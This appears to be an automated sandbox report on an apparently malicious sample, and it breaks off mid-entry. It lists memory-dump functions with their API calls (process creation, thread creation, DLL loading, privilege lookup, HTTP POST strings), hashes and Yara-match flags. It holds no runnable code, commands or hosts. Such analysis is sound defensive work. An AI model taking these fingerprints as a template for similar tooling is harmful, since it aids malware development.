                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f0f4a081bc52efcd01fe07652e4892305bd7d4e9b5cc16b60d5472d85f5b6ac6
                                                                                        • Instruction ID: 9f1b0fff3b57793580c8f6043071a23e09003bc05b242f715b2a37d9b19006f3
                                                                                        • Opcode Fuzzy Hash: f0f4a081bc52efcd01fe07652e4892305bd7d4e9b5cc16b60d5472d85f5b6ac6
                                                                                        • Instruction Fuzzy Hash: BC90026121184442E200A9694C15B0701099BD1343F91C515A0145554CCA5588616561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03669910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5da1b7e37f556180faa24fcfb53e31b9f030f00a59ac5433083665afbb997d3b
                                                                                        • Instruction ID: 212d37b3924a95e57f5c17c4a9d1e8e963fdb252a27575756f1797e450eda950
                                                                                        • Opcode Fuzzy Hash: 5da1b7e37f556180faa24fcfb53e31b9f030f00a59ac5433083665afbb997d3b
                                                                                        • Instruction Fuzzy Hash: 4C9002B120104802E140B559440574601099BD1341F91C411A5055554E87998DD576A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 036699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1de1fb233e649fe030ad8f87bb360ef99b567801a7a5218fba29f8faae96e419
                                                                                        • Instruction ID: d943b9d53620c4d0263b1a5069110145ffb04ccb9d2ed04ea1451f6ee2216060
                                                                                        • Opcode Fuzzy Hash: 1de1fb233e649fe030ad8f87bb360ef99b567801a7a5218fba29f8faae96e419
                                                                                        • Instruction Fuzzy Hash: 449002A134104842E100A5594415B060109DBE2341F91C415E1055554D8759CC527166
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03669860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 02a006999031815bed5a3a11443509b7a5f22e80ef1bd75b850a6d2d22e77ba4
                                                                                        • Instruction ID: 3fcce97c7838581995abd0f1df8f0de7693602670fc6633e5f3359ba01970ac7
                                                                                        • Opcode Fuzzy Hash: 02a006999031815bed5a3a11443509b7a5f22e80ef1bd75b850a6d2d22e77ba4
                                                                                        • Instruction Fuzzy Hash: E790027120104813E111A5594505707010D9BD1281FD1C812A0415558D97968952B161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03669840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 27e20385fb464fafe16a9dd1bb1f72f1084ada3cdbb6456613446a97e71bb82c
                                                                                        • Instruction ID: 8cad670f6727fc6b40e43e3a5eacbda608c2a751c6b5c18f649901aa19e2f5d2
                                                                                        • Opcode Fuzzy Hash: 27e20385fb464fafe16a9dd1bb1f72f1084ada3cdbb6456613446a97e71bb82c
                                                                                        • Instruction Fuzzy Hash: FA900261242085526545F5594405507410AABE12817D1C412A1405950C86669856E661
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03669710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f9d1a261d9844eb0cfde8bb1d0e674fbcccd761107fbc249990d36c7d541e84d
                                                                                        • Instruction ID: e6a749c7526fa01bebe265ed0ca8035b19cfd8e6ba265b43d28f0c17cbefb6f3
                                                                                        • Opcode Fuzzy Hash: f9d1a261d9844eb0cfde8bb1d0e674fbcccd761107fbc249990d36c7d541e84d
                                                                                        • Instruction Fuzzy Hash: BC90027120104802E100A999540964601099BE1341F91D411A5015555EC7A588917171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03669FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f411f5f51b23797b3c1da7034b40ceeecc79ccd923373e11ee3efd7a9b8be912
                                                                                        • Instruction ID: c18b0cd6dc203a5bb18a5b323843cc87ca647821330b1b72dfe86b608053d839
                                                                                        • Opcode Fuzzy Hash: f411f5f51b23797b3c1da7034b40ceeecc79ccd923373e11ee3efd7a9b8be912
                                                                                        • Instruction Fuzzy Hash: 8F90027131118802E110A559840570601099BD2241F91C811A0815558D87D588917162
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03669780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: de9f05109e52441869d75b6a9c4d600034459d4c303e604dc3bb897e1aa18552
                                                                                        • Instruction ID: 9a498f929d10f1d6fadc5b26d335e89d19aac8854312b8e2b3417ae098a57168
                                                                                        • Opcode Fuzzy Hash: de9f05109e52441869d75b6a9c4d600034459d4c303e604dc3bb897e1aa18552
                                                                                        • Instruction Fuzzy Hash: 1390026921304402E180B559540960A01099BD2242FD1D815A0006558CCA5588696361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03669660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f1ab9f8566ae327b63b7a29d08e7f20cf824aa145fbfad45524c3cbf572f0d30
                                                                                        • Instruction ID: 37c351b76bdc5472a7b7176352ccc5e9abacb2d565a3cb50162e55e2cba39118
                                                                                        • Opcode Fuzzy Hash: f1ab9f8566ae327b63b7a29d08e7f20cf824aa145fbfad45524c3cbf572f0d30
                                                                                        • Instruction Fuzzy Hash: C990027120104C02E180B559440564A01099BD2341FD1C415A0016654DCB558A5977E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03669650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 37cc26109f302a852edaadf7448e7164b96abebfb375c8c0613365f3f599a252
                                                                                        • Instruction ID: 14cb30cd6a2a35a88b9337f6af70c67712926cf1ef841d002fd33375b310a119
                                                                                        • Opcode Fuzzy Hash: 37cc26109f302a852edaadf7448e7164b96abebfb375c8c0613365f3f599a252
                                                                                        • Instruction Fuzzy Hash: EA90027120508C42E140B5594405A4601199BD1345F91C411A0055694D97658D55B6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 036696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 2690a9225fd5aecfdf88cbec5b1f399256b7620bc43153e35bb39863f4350736
                                                                                        • Instruction ID: 33fae6a3c54a6b034a46c632acf39690bd6c5f4b186a08e8d2f0f50cc2ebb6df
                                                                                        • Opcode Fuzzy Hash: 2690a9225fd5aecfdf88cbec5b1f399256b7620bc43153e35bb39863f4350736
                                                                                        • Instruction Fuzzy Hash: CA9002712010CC02E110A559840574A01099BD1341F95C811A4415658D87D588917161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 036696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: ae7465e18d353abd02cb69b4d85339839a0c59db8014c89df9c7488e4c253535
                                                                                        • Instruction ID: ad943bd78c405a2fe1a60682c7f297f2d1c5e5ba8e4ac740af740b40a7ed6f2d
                                                                                        • Opcode Fuzzy Hash: ae7465e18d353abd02cb69b4d85339839a0c59db8014c89df9c7488e4c253535
                                                                                        • Instruction Fuzzy Hash: E590027120104C42E100A5594405B4601099BE1341F91C416A0115654D8755C8517561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03669540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 26594780346f6083a9fbedcd4cb69cfd4af62c884f1d31471db93acab3b13a6e
                                                                                        • Instruction ID: ac939858a901b22dda2a13929c2cedf69e1fa32856c859db1806fc776642ec8c
                                                                                        • Opcode Fuzzy Hash: 26594780346f6083a9fbedcd4cb69cfd4af62c884f1d31471db93acab3b13a6e
                                                                                        • Instruction Fuzzy Hash: 1A900265211044031105E9590705507014A9BD6391391C421F1006550CD76188616161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 036695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.474241766.0000000003600000.00000040.00000001.sdmp, Offset: 03600000, based on PE: true
                                                                                        • Associated: 00000005.00000002.474705213.000000000371B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000005.00000002.474720424.000000000371F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: b56fc37cf7e10e28192e376795cf226c35869cc1a009d0b93c3dec35c94853bf
                                                                                        • Instruction ID: baba051a66cbc8b8cdfd64fcb61dddd62e08a1d28735e838eb41a7654a02dbb1
                                                                                        • Opcode Fuzzy Hash: b56fc37cf7e10e28192e376795cf226c35869cc1a009d0b93c3dec35c94853bf
                                                                                        • Instruction Fuzzy Hash: 949002A1202044035105B5594415616410E9BE1241B91C421E1005590DC66588917165
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03218C46, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 102sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 03218CF8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: POST$net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-3140911592
                                                                                        • Opcode ID: 081d4a635f5b4dbaaa58427d58026f6adf076041d2d8a81e034f16046179be89
                                                                                        • Instruction ID: a5b4cfdc4cc67346358aa19c9c376b2312447e33601d88d114468afb94081a9b
                                                                                        • Opcode Fuzzy Hash: 081d4a635f5b4dbaaa58427d58026f6adf076041d2d8a81e034f16046179be89
                                                                                        • Instruction Fuzzy Hash: 4B314676610305BFC720DF68D9C0BABB7F8EF58700F048119EA195F281C7B0A5A1CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03218C50, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 03218CF8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID: net.dll$wininet.dll
                                                                                        • API String ID: 3472027048-1269752229
                                                                                        • Opcode ID: 89b029ebf24f1f3c490a291b6fdd97e37720bdf97cc7d74b91ae34831b6487cc
                                                                                        • Instruction ID: 9592f635c6e235490c685af07673270ab5ccb524beef20bf3abe512ee33578e0
                                                                                        • Opcode Fuzzy Hash: 89b029ebf24f1f3c490a291b6fdd97e37720bdf97cc7d74b91ae34831b6487cc
                                                                                        • Instruction Fuzzy Hash: D931B2B6500344BBC724DF64C9C4FA7B7F8BB58700F04841DE629AB240D770B6A0CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0321A240, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03203AF8), ref: 0321A26D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                        • Instruction ID: a77ae5e76bece57fba548248af60444ab587f9814346da1388646fe8102b27ba
                                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                        • Instruction Fuzzy Hash: 30E04FB52103046BD714DF59CC44EA777ADEF88750F014554FD085B241C630F910CAF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 032082E9, Relevance: 3.1, APIs: 2, Instructions: 60threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0320834A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0320836B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 57e6249f15dfc202c4f800aa34a90455dcc62a732c84f5e189395e1ee08c387f
                                                                                        • Instruction ID: 7fe40a2c5d10816789d282f0edbfe53c55eff4b635608f7dedceffe7a88fb47a
                                                                                        • Opcode Fuzzy Hash: 57e6249f15dfc202c4f800aa34a90455dcc62a732c84f5e189395e1ee08c387f
                                                                                        • Instruction Fuzzy Hash: 5F012835A903297BE720E7A49C02FBF776C6B91B10F094158FB04BE1C1E6D4695E43E2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 032082F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0320834A
                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0320836B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID:
                                                                                        • API String ID: 1836367815-0
                                                                                        • Opcode ID: 3a43bf08853bf4d1c209ad24407e60fd4767927b3b2c21342dcd6e1016b28c63
                                                                                        • Instruction ID: b2c59d4d411d7b8a9d314a547dd2d804f6f9e751beb8a63f41e0601494d13526
                                                                                        • Opcode Fuzzy Hash: 3a43bf08853bf4d1c209ad24407e60fd4767927b3b2c21342dcd6e1016b28c63
                                                                                        • Instruction Fuzzy Hash: C501F235A903287BE720E6A89C02FBF776CAB40B50F044018FF08BE1C1E6D4691A42F6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0321A345, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0320F1A2,0320F1A2,?,00000000,?,?), ref: 0321A3D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        • Opcode ID: 845c83c331bfdb7e88d7b76dbf6fe95a07d22fd3af396e9cb6d153544b2fca4a
                                                                                        • Instruction ID: 4262b7e140cee112771bba8af387fa5416fa1d1deabe38323d9ce80f851ed2c4
                                                                                        • Opcode Fuzzy Hash: 845c83c331bfdb7e88d7b76dbf6fe95a07d22fd3af396e9cb6d153544b2fca4a
                                                                                        • Instruction Fuzzy Hash: E60139B5210208BBDB14DF98DC45EEB37A9AF88210F018158FE08A7241C630A9118BF0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0320ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0320AD42
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                        • Instruction ID: 41fc1e76708531248bb2512dc100edb37dee8f61463cace657d34ae9ab438bc0
                                                                                        • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                                                        • Instruction Fuzzy Hash: FB0171B9D5020EBBDF10EBE4DD41FDDB3B89B14208F0441A4E9189B281F670EB98CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0321A2B0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0321A304
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                        • Instruction ID: afac7a59a91ccbaa04a9c8acc92676f1adb148938a749f91e59fa73721482cc5
                                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                        • Instruction Fuzzy Hash: EA01AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03218D80, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0320F020,?,?,00000000), ref: 03218DBC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: 84829ae07d1ac0279ef6691df916ab36c295a33a6b61ca73a61e6fee163650a1
                                                                                        • Instruction ID: a453b22c9e9980d0b75bdd91712f83f21567be78f072635d2cf2f19ad0280b50
                                                                                        • Opcode Fuzzy Hash: 84829ae07d1ac0279ef6691df916ab36c295a33a6b61ca73a61e6fee163650a1
                                                                                        • Instruction Fuzzy Hash: 7CE06D773903043AE230A5A9AC02FA7B29C9BA1B31F55002AFB0DEA2C0D595F45142E4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0321A309, Relevance: 1.5, APIs: 1, Instructions: 35processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0321A304
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: bd617a7e86c00d455e77f57b96e9fa8795cdc5bdc937140cab34566f01a2c636
                                                                                        • Instruction ID: b9bcfc0a6ff42040a3d7cf1abb4626a16e16e42c2149039781b527fabc9484b6
                                                                                        • Opcode Fuzzy Hash: bd617a7e86c00d455e77f57b96e9fa8795cdc5bdc937140cab34566f01a2c636
                                                                                        • Instruction Fuzzy Hash: 3EF0AFB2221008AFCB44DF89DC90CEB73EEAF8C314B158208FA0DD3204C630EC618BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03218D7D, Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0320F020,?,?,00000000), ref: 03218DBC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: a440d6fcca55b5d44b7041ddf94226b1e69f6d41edccf2381e26875cee186e67
                                                                                        • Instruction ID: 2aebbdfbc7accd441058c08e5709f40f0f13c8db1dcbe88d2a3d08bcc23a9b35
                                                                                        • Opcode Fuzzy Hash: a440d6fcca55b5d44b7041ddf94226b1e69f6d41edccf2381e26875cee186e67
                                                                                        • Instruction Fuzzy Hash: 62E0D8773903003AE33065689C03FEB77ECDBA1B20F250029FB09AB2C0D9E5F45186A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0320F697, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,03208CF4,?), ref: 0320F6CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 9434b4fd9586b4fbef240cc5793c195e0017a82802c45eba99af980ea47acec3
                                                                                        • Instruction ID: 3338d348bca6dec5d4dfffd1e1c9010df940e0547fd5970e2b71e564292f0067
                                                                                        • Opcode Fuzzy Hash: 9434b4fd9586b4fbef240cc5793c195e0017a82802c45eba99af980ea47acec3
                                                                                        • Instruction Fuzzy Hash: 57E07D821FC34A2DD330FAB02E02F173B455711300F2D49AAD48CEE0E3C408C0884236
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0321A3A0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0320F1A2,0320F1A2,?,00000000,?,?), ref: 0321A3D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Offset: 03200000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
